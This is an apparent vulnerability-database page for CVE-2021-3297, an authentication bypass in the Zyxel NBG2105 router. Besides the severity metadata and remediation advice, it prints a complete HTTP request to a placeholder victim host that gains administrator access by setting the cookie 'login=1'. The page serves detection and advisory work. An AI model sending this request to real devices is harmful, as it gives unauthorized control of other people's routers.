🔙 목록으로 돌아가기

CVE-2021-3297: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass

TitleZyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass
Authorgy741
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information, unauthorized configuration changes, and potential compromise of the affected device.
RemediationApply the latest firmware update provided by Zyxel to fix the authentication bypass vulnerability.
CVSS Score7.8
EPSS Score0.86299
CVE IDCVE-2021-3297
CWE IDCWE-287
Tags cve cve2021 zyxel auth-bypass router vkev vuln

🔍 Vulnerability Description

Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access.

🌐 HTTP Request

GET /status.htm HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Connection: close
Cookie: language=en; login=1
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3297.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-3297.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A